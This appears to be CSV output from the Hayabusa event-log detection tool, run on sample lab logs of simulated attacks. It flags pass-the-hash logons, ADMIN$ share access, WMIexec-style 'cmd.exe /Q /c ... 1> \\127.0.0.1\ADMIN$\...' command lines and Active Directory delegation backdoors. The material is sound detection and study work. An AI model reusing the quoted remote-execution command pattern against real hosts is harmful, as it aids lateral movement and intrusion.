2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
